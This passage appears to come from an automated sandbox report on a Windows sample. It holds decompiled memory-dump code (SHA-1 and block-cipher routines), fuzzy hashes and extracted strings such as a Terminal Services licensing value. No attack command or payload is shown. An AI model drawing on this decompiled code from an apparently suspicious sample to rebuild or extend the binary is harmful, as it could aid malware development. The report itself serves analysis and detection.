            					_v12 = _t303;
            					asm("rol eax, 0x5");
            					_v16 = _t347;
            					_t537 = (_t347 ^ _t372 ^ _t406) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
            					_t305 = _t372;
            					_v8 = _t347;
            					asm("ror edx, 0x2");
            					_v8 = _t372;
            					_t360 = _v12;
            					_v12 = _t537;
            					asm("rol esi, 0x5");
            					_t481 = _t482 + 5;
            					_t504 = (_t305 ^ _t406 ^ _t360) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x13c)) + _t537 + _v16 - 0x359d3e2a;
            					_v16 = _t305;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v8 = _t406;
            					_v12 = _t504;
            					_v8 = _t481;
            				} while (_t481 < 0x50);
            				_t483 = _a4;
            				 *((intOrPtr*)(_t483 + 8)) =  *((intOrPtr*)(_t483 + 8)) + _t360;
            				 *((intOrPtr*)(_t483 + 0xc)) =  *((intOrPtr*)(_t483 + 0xc)) + _t406;
            				_t311 =  *((intOrPtr*)(_t483 + 0x10)) + _v16;
            				 *_t483 =  *_t483 + _t504;
            				 *((intOrPtr*)(_t483 + 4)) =  *((intOrPtr*)(_t483 + 4)) + _t279;
            				 *((intOrPtr*)(_t483 + 0x10)) = _t311;
            				 *((intOrPtr*)(_t483 + 0x5c)) = 0;
            				return _t311;
            			}


            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID: (
            • API String ID: 0-3887548279
            • Opcode ID: 16ad0e83028ded31a3cdeddfc444c30f452b6fcd251fa8a92e51cf0b3739a772
            • Instruction ID: 85bcffc771d83be5445b10d2be3e0494e79f935d6969f565067c0c2cc8a6ac44
            • Opcode Fuzzy Hash: 16ad0e83028ded31a3cdeddfc444c30f452b6fcd251fa8a92e51cf0b3739a772
            • Instruction Fuzzy Hash: 71022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E00409E30(signed int* _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				char _v304;
            				signed char* _t277;
            				signed int* _t278;
            				signed int _t279;
            				signed int _t285;
            				signed int _t288;
            				signed int _t292;
            				signed int _t295;
            				signed int _t299;
            				signed int _t303;
            				signed int _t305;
            				signed int _t311;
            				signed int _t318;
            				signed int _t320;
            				signed int _t323;
            				signed int _t325;
            				signed int _t334;
            				signed int _t340;
            				signed int _t341;
            				signed int _t346;
            				signed int _t353;
            				signed int _t357;
            				signed int _t358;
            				signed int _t362;
            				signed int _t365;
            				signed int _t369;
            				signed int _t370;
            				signed int _t399;
            				signed int _t404;
            				signed int _t410;
            				signed int _t413;
            				signed int _t420;
            				signed int _t423;
            				signed int _t432;
            				signed int _t434;
            				signed int _t437;
            				signed int _t445;
            				signed int _t459;
            				signed int _t462;
            				signed int _t463;
            				signed int _t464;
            				signed int _t470;
            				signed int _t478;
            				signed int _t479;
            				signed int* _t480;
            				signed int* _t481;
            				signed int _t488;
            				signed int _t491;
            				signed int _t496;
            				signed int _t499;
            				signed int _t502;
            				signed int _t505;
            				signed int _t506;
            				signed int _t510;
            				signed int _t522;
            				signed int _t525;
            				signed int _t532;
            				void* _t536;
            
            				_t481 = _a4;
            				_t353 = 0;
            				_t2 =  &(_t481[7]); // 0x1b
            				_t277 = _t2;
            				do {
            					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
            					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
            					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
            					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
            					_t353 = _t353 + 4;
            					_t277 =  &(_t277[0x10]);
            				} while (_t353 < 0x10);
            				_t278 =  &_v304;
            				_v8 = 0x10;
            				do {
            					_t399 =  *(_t278 - 0x18);
            					_t459 =  *(_t278 - 0x14);
            					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
            					asm("rol ecx, 1");
            					asm("rol ebx, 1");
            					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
            					_t278[8] = _t357;
            					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
            					_t278 =  &(_t278[4]);
            					asm("rol ebx, 1");
            					asm("rol edx, 1");
            					_t46 =  &_v8;
            					 *_t46 = _v8 - 1;
            					_t278[6] = _t318 ^ _t399;
            					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
            				} while ( *_t46 != 0);
            				_t320 =  *_t481;
            				_t279 = _t481[1];
            				_t358 = _t481[2];
            				_t404 = _t481[3];
            				_v12 = _t320;
            				_v16 = _t481[4];
            				_v8 = 0;
            				do {
            					asm("rol ebx, 0x5");
            					_t462 = _v8;
            					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
            					_t323 = _v12;
            					asm("ror eax, 0x2");
            					_v16 = _t404;
            					_v12 = _t488;
            					asm("rol esi, 0x5");
            					_v8 = _t358;
            					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
            					_t491 = _t279;
            					asm("ror ebx, 0x2");
            					_v16 = _v8;
            					_t362 = _v12;
            					_v8 = _t323;
            					_t325 = _v8;
            					_v12 = _t410;
            					asm("rol edx, 0x5");
            					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
            					_t413 = _v12;
            					_v16 = _t491;
            					asm("ror ecx, 0x2");
            					_v8 = _t362;
            					_v12 = _t285;
            					asm("rol eax, 0x5");
            					_v16 = _t325;
            					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
            					_t358 = _v12;
            					_t288 = _v8;
            					asm("ror edx, 0x2");
            					_v8 = _t413;
            					_v12 = _t496;
            					asm("rol esi, 0x5");
            					_v16 = _t288;
            					_t279 = _v12;
            					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
            					_t404 = _v8;
            					asm("ror ecx, 0x2");
            					_t463 = _t462 + 5;
            					_t320 = _t499;
            					_v12 = _t320;
            					_v8 = _t463;
            				} while (_t463 < 0x14);
            				_t464 = 0x14;
            				do {
            					asm("rol esi, 0x5");
            					asm("ror eax, 0x2");
            					_v16 = _t404;
            					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
            					_t334 = _v12;
            					_v12 = _t502;
            					asm("rol esi, 0x5");
            					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
            					asm("ror ebx, 0x2");
            					_t505 = _t279;
            					_v16 = _t358;
            					_t365 = _v12;
            					_v12 = _t420;
            					asm("rol edx, 0x5");
            					asm("ror ecx, 0x2");
            					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
            					_t423 = _v12;
            					_v8 = _t334;
            					_v8 = _t365;
            					_v12 = _t292;
            					asm("rol eax, 0x5");
            					_t464 = _t464 + 5;
            					_t358 = _v12;
            					asm("ror edx, 0x2");
            					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
            					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
            					_t295 = _v8;
            					_v8 = _t423;
            					_v12 = _t506;
            					asm("rol esi, 0x5");
            					_t404 = _v8;
            					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
            					_v16 = _t295;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t499;
            				} while (_t464 < 0x28);
            				_v8 = 0x28;
            				do {
            					asm("rol esi, 0x5");
            					_v16 = _t404;
            					asm("ror eax, 0x2");
            					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
            					_t470 = _v12;
            					_v12 = _t510;
            					asm("rol esi, 0x5");
            					_t340 = _v8;
            					asm("ror edi, 0x2");
            					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
            					_v16 = _t358;
            					_t369 = _v12;
            					_v12 = _t432;
            					asm("rol edx, 0x5");
            					_v8 = _t279;
            					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
            					asm("ror ecx, 0x2");
            					_v16 = _v8;
            					_t299 = _v12;
            					_v8 = _t470;
            					_v12 = _t434;
            					asm("rol edx, 0x5");
            					asm("ror eax, 0x2");
            					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
            					_v16 = _v8;
            					_t437 = _t369;
            					_t358 = _v12;
            					_v8 = _t437;
            					_v12 = _t522;
            					asm("rol esi, 0x5");
            					_v16 = _v8;
            					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
            					_t404 = _t299;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t499;
            					_t341 = _t340 + 5;
            					_v8 = _t341;
            				} while (_t341 < 0x3c);
            				_t478 = 0x3c;
            				_v8 = 0x3c;
            				do {
            					asm("rol esi, 0x5");
            					_t479 = _v8;
            					asm("ror eax, 0x2");
            					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
            					_t346 = _v12;
            					_v16 = _t404;
            					_v12 = _t525;
            					asm("rol esi, 0x5");
            					asm("ror ebx, 0x2");
            					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
            					_v16 = _t358;
            					_t370 = _v12;
            					_v12 = _t445;
            					asm("rol edx, 0x5");
            					_v16 = _t279;
            					asm("ror ecx, 0x2");
            					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
            					_t404 = _v12;
            					_v12 = _t303;
            					asm("rol eax, 0x5");
            					_v16 = _t346;
            					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
            					_t305 = _t370;
            					_v8 = _t346;
            					asm("ror edx, 0x2");
            					_v8 = _t370;
            					_t358 = _v12;
            					_v12 = _t532;
            					asm("rol esi, 0x5");
            					_t478 = _t479 + 5;
            					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
            					_v16 = _t305;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v8 = _t404;
            					_v12 = _t499;
            					_v8 = _t478;
            				} while (_t478 < 0x50);
            				_t480 = _a4;
            				_t480[2] = _t480[2] + _t358;
            				_t480[3] = _t480[3] + _t404;
            				_t311 = _t480[4] + _v16;
            				 *_t480 =  *_t480 + _t499;
            				_t480[1] = _t480[1] + _t279;
            				_t480[4] = _t311;
            				_t480[0x17] = 0;
            				return _t311;
            			}


            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID: (
            • API String ID: 0-3887548279
            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
            • Instruction ID: eeb0385743567321b296ee52300d967ee07cf61effa89e1da4901bd412379478
            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
            • Instruction Fuzzy Hash: 11021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: /X
            • API String ID: 0-2476569911
            • Opcode ID: e1697be07d4b3e391454b97d204eaaa09069d2796e29debf660cd1e0951ac95a
            • Instruction ID: 70354d279e57c4867b3811c5617f5ceb2ea30d1ba5fb74e9ecb6d3b536d06d6a
            • Opcode Fuzzy Hash: e1697be07d4b3e391454b97d204eaaa09069d2796e29debf660cd1e0951ac95a
            • Instruction Fuzzy Hash: 3BE1D375A0231DCFDB24DF24C984BB9B7B6BF85314F1401AAEA099B291D734AD81CF51
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: PATH
            • API String ID: 0-1036084923
            • Opcode ID: bccf0257cd1586879add6644fc5a2a2463c62138a8618d9a4d2b352d512d846b
            • Instruction ID: d7cdaa0fcda9c3a96bd8b94aeb732d96ac32cc5ce4d8c74257de2480b88063ca
            • Opcode Fuzzy Hash: bccf0257cd1586879add6644fc5a2a2463c62138a8618d9a4d2b352d512d846b
            • Instruction Fuzzy Hash: 1CC180B1D00219DFCB24DFA9D991BEEB7B5FF48740F194029E811AB290E734E991CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: f9e51fa7ed1cb36f85b7a86adbf40520465290fbffd2fdb35cf32ec65272afcf
            • Instruction ID: 85f4b361284323f6fb4bf54e0dff86c5ddee1edd2cd582e4fa9b63009e435ab0
            • Opcode Fuzzy Hash: f9e51fa7ed1cb36f85b7a86adbf40520465290fbffd2fdb35cf32ec65272afcf
            • Instruction Fuzzy Hash: 72618A72D00219AFDF21DFA8C944BEEBBB4FF84711F20426AE814A7250D7749E45CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
            • Instruction ID: e028784c3c80aa6a270f3554af3c4bc39ce3c7db44509949eb4c7d647d2a3bfd
            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
            • Instruction Fuzzy Hash: FE51B071604710AFC321DF28C941A6BB7F8FF48B50F108A2DFA9587691E7B4E954CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: BinaryHash
            • API String ID: 0-2202222882
            • Opcode ID: 50dac8ce4c771580edd9336b43a9f2e2e5e1a430000f3fef47b7979df49be3e1
            • Instruction ID: 1df265708a288d5819395a784303606256f47241dadd4883a04c4a5f8c1667fd
            • Opcode Fuzzy Hash: 50dac8ce4c771580edd9336b43a9f2e2e5e1a430000f3fef47b7979df49be3e1
            • Instruction Fuzzy Hash: 9C416FB2D0012CABDF21DA54DD81FEEB77CAB44714F0045A5FA09AB241DB709F898FA4
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: `
            • API String ID: 0-2679148245
            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
            • Instruction ID: f58bee6d5befff9ca349c65bd2aaa53c12816f959f3b66f92c222c55a6943b4b
            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
            • Instruction Fuzzy Hash: A931C0326043456BE720DF28CD95F9B77DDAB84754F044229FA589B2C2E7B0ED24CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: #
            • API String ID: 0-1885708031
            • Opcode ID: 7214fd34cf6f3db3f10b96e9e4271c303fd579c4ef9ef36f97b02541178c6b54
            • Instruction ID: 3e75672c8524c6f2a4bf4199c03140bfe8ce0756d9df419efed218ab8e2ee047
            • Opcode Fuzzy Hash: 7214fd34cf6f3db3f10b96e9e4271c303fd579c4ef9ef36f97b02541178c6b54
            • Instruction Fuzzy Hash: 8341A975A0021ADBCB24DF48C990BBEB7B9EF85701F10015AFA56AB241DB34D941CBE1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00A140E8
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
            • API String ID: 0-996340685
            • Opcode ID: 22efebbed4a01f2a4940371cb0896b7556aa7609e05d211f54d33c9f0df3a2b7
            • Instruction ID: 2b9aa644ca9a46a19c6d872a19641c5f3d634655e974238e04e42c519ae70623
            • Opcode Fuzzy Hash: 22efebbed4a01f2a4940371cb0896b7556aa7609e05d211f54d33c9f0df3a2b7
            • Instruction Fuzzy Hash: E1418F75A0074AAAC724DFA8C4416E6F7F4AF19710F00492EDAAAC7240E334A585CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: BinaryName
            • API String ID: 0-215506332
            • Opcode ID: fb22ddded77598f2fe0f2f1673ff7844e80189fcc99521e995f5dde24a79d9f0
            • Instruction ID: 79fe89349dae2dafda06cb54d057d35c92e36463104d49005b870ff92b832385
            • Opcode Fuzzy Hash: fb22ddded77598f2fe0f2f1673ff7844e80189fcc99521e995f5dde24a79d9f0
            • Instruction Fuzzy Hash: B2312133D01619AFEF15CB59C951E6FB7B4EB80B20F014129E914A7280D7709F01CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: 02d375e901fb72281cbd1f6a95c150bd2bca11b6bc4b8b248e13e919edb16619
            • Instruction ID: 390031d34dd288727e758834ae9d9bb4843b4d96ad9b85e8b8a512012db2a38e
            • Opcode Fuzzy Hash: 02d375e901fb72281cbd1f6a95c150bd2bca11b6bc4b8b248e13e919edb16619
            • Instruction Fuzzy Hash: DC31CFB15083049FC310DF28D9819ABBBF8EB89754F000A2EF9A497250D734DD48CBA3
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: Actx
            • API String ID: 0-89312691
            • Opcode ID: 612aef92f87a6b9974341099053117c8ab4549d11e079a100bfc5ded6efb2618
            • Instruction ID: b87ef36afb79972466f76b06c72ed401a52acca48f654c33a09b4867bd94eb34
            • Opcode Fuzzy Hash: 612aef92f87a6b9974341099053117c8ab4549d11e079a100bfc5ded6efb2618
            • Instruction Fuzzy Hash: 6211B235B0470A8FEB348F1DA89073672A5AB95724F35453AE865EBBD1DBB0CC418343
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
            • Instruction ID: d30ebbe8d3dc833c0c1a48f4d75c74c2ba5329e47944e90dd1e1142869a4d4ff
            • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
            • Instruction Fuzzy Hash: 4162E736E046969BCB23CF26C45037ABBA5AF95310F3D85BACC999B242D375DD41C780
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 07190870850110f0c073eba39ca512680042bdbb972ab7ca5ef1c9cc8e453b64
            • Instruction ID: 2d0a9a9c1114ef2186d64a611fdf104e5eb398f291d424f0caaa23312fdf2067
            • Opcode Fuzzy Hash: 07190870850110f0c073eba39ca512680042bdbb972ab7ca5ef1c9cc8e453b64
            • Instruction Fuzzy Hash: 2342E34644E3D25FE7034B7468756E2BFB18F17260B0E56DBE0C48F4A3D10917AAE7A2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f6e015c1c633b7188c4afbe1184e1d2bf116b156d9ce2e640d78537b3a23516c
            • Instruction ID: 6ad34a6180b1264a05bee3c043e91362dbc08c6660acd254af44685ce73e743f
            • Opcode Fuzzy Hash: f6e015c1c633b7188c4afbe1184e1d2bf116b156d9ce2e640d78537b3a23516c
            • Instruction Fuzzy Hash: AA32F34644E3D25FE7030B7468756E2BFB18F17260B0E56DBE0C48F4A3D10916AEE7A2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 75d3192128628d588d69e17ffc3727c36a2104e5cc39a7e6837ecbfe654fde13
            • Instruction ID: 78574360e5592d814d74077a4428712666e1e36dbbe5e404b4de8b73a1608bd3
            • Opcode Fuzzy Hash: 75d3192128628d588d69e17ffc3727c36a2104e5cc39a7e6837ecbfe654fde13
            • Instruction Fuzzy Hash: 6D228231E00A158FCB19CF69C490AAEB3F1BF9A314F28856DD8519B385DB34AD41CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8699e4f1d66b72dbc053f45412415d4d25ddf09aefc166c41688923dc01fca63
            • Instruction ID: 190df85abe7174a778cc841d723f73d835ab107650336bdf030536e08e6f91f2
            • Opcode Fuzzy Hash: 8699e4f1d66b72dbc053f45412415d4d25ddf09aefc166c41688923dc01fca63
            • Instruction Fuzzy Hash: E3228071A042118FCB19CF19C590A6AB7E1FF8A314F188A6DE896CB391D734EC46CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c1735f5a65dec231d97b7cbc1e33e2489666414e40378b7416c2b174e0c7d25c
            • Instruction ID: 2aef71afe8a86a5a0cede02fb345276089013c56f764315d24cde9d7ea3cab3b
            • Opcode Fuzzy Hash: c1735f5a65dec231d97b7cbc1e33e2489666414e40378b7416c2b174e0c7d25c
            • Instruction Fuzzy Hash: FD02A272E006158BCB18CFA9C9916FEFBF9AF88300B59856DD456DB382D734E941CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4b697e7b844d000a3931c73c58bb82c368a47e59e554ff9483f4d6f1246d7503
            • Instruction ID: 19ad047f74e9c6dae7917687b8a7270c9798b6f47234a189ff87a6ff82564f5a
            • Opcode Fuzzy Hash: 4b697e7b844d000a3931c73c58bb82c368a47e59e554ff9483f4d6f1246d7503
            • Instruction Fuzzy Hash: F4026E75D0821DCFCB28CF99E494AADB7B1EF44700F65812EE816AB2D0E770AC91CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e9297a5568a85ba42f27adc1b0338b9191e37faec70d9c0185a9082ad6d5ca6e
            • Instruction ID: eba02784125cd233ada86c07f325968ea13596aef537440a3821a72e411b5c9e
            • Opcode Fuzzy Hash: e9297a5568a85ba42f27adc1b0338b9191e37faec70d9c0185a9082ad6d5ca6e
            • Instruction Fuzzy Hash: 4E02F2746046518BD764CF29C480276BBF1EF4A340B2DC59AE8E6CB2C1D339E956EF60
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 126b9c1711bdc18ee9fafbac481c62e4654dd38ad0d0f8b43b1ef5d05c7dbe08
            • Instruction ID: 613878a2e3f3a806060a23cde33f80559624406c55d7d5b78c1f806bbbb5b1d1
            • Opcode Fuzzy Hash: 126b9c1711bdc18ee9fafbac481c62e4654dd38ad0d0f8b43b1ef5d05c7dbe08
            • Instruction Fuzzy Hash: F8F19272F002168BCB18DFA9C9D15FDFBF9AB59300B198269D856EB382D634DD41CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4a7ab8ea68ce2f012d5ca4be9ed12256fc7237f60614cf695965a3431dbb4f00
            • Instruction ID: ba6ea2048e2f13434bbe6cfb5478656d39d26415e88bf9b10e297ec269c990fb
            • Opcode Fuzzy Hash: 4a7ab8ea68ce2f012d5ca4be9ed12256fc7237f60614cf695965a3431dbb4f00
            • Instruction Fuzzy Hash: 17F17AB46082158BCB24CF19D480A7AB7F1FF98704F15892EF98ACB290E735DD91DB52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 26%
            			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				void* _t273;
            				signed int _t274;
            				signed int _t282;
            				signed int* _t358;
            				signed int _t383;
            				signed int* _t409;
            				signed int _t429;
            				signed int _t458;
            				signed int _t478;
            				signed int _t560;
            				signed int _t603;
            
            				_t273 = __eax;
            				asm("ror edi, 0x8");
            				asm("rol edx, 0x8");
            				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
            				asm("ror ebx, 0x8");
            				asm("rol edx, 0x8");
            				_v20 = _t458;
            				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
            				asm("ror ebx, 0x8");
            				asm("rol edx, 0x8");
            				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
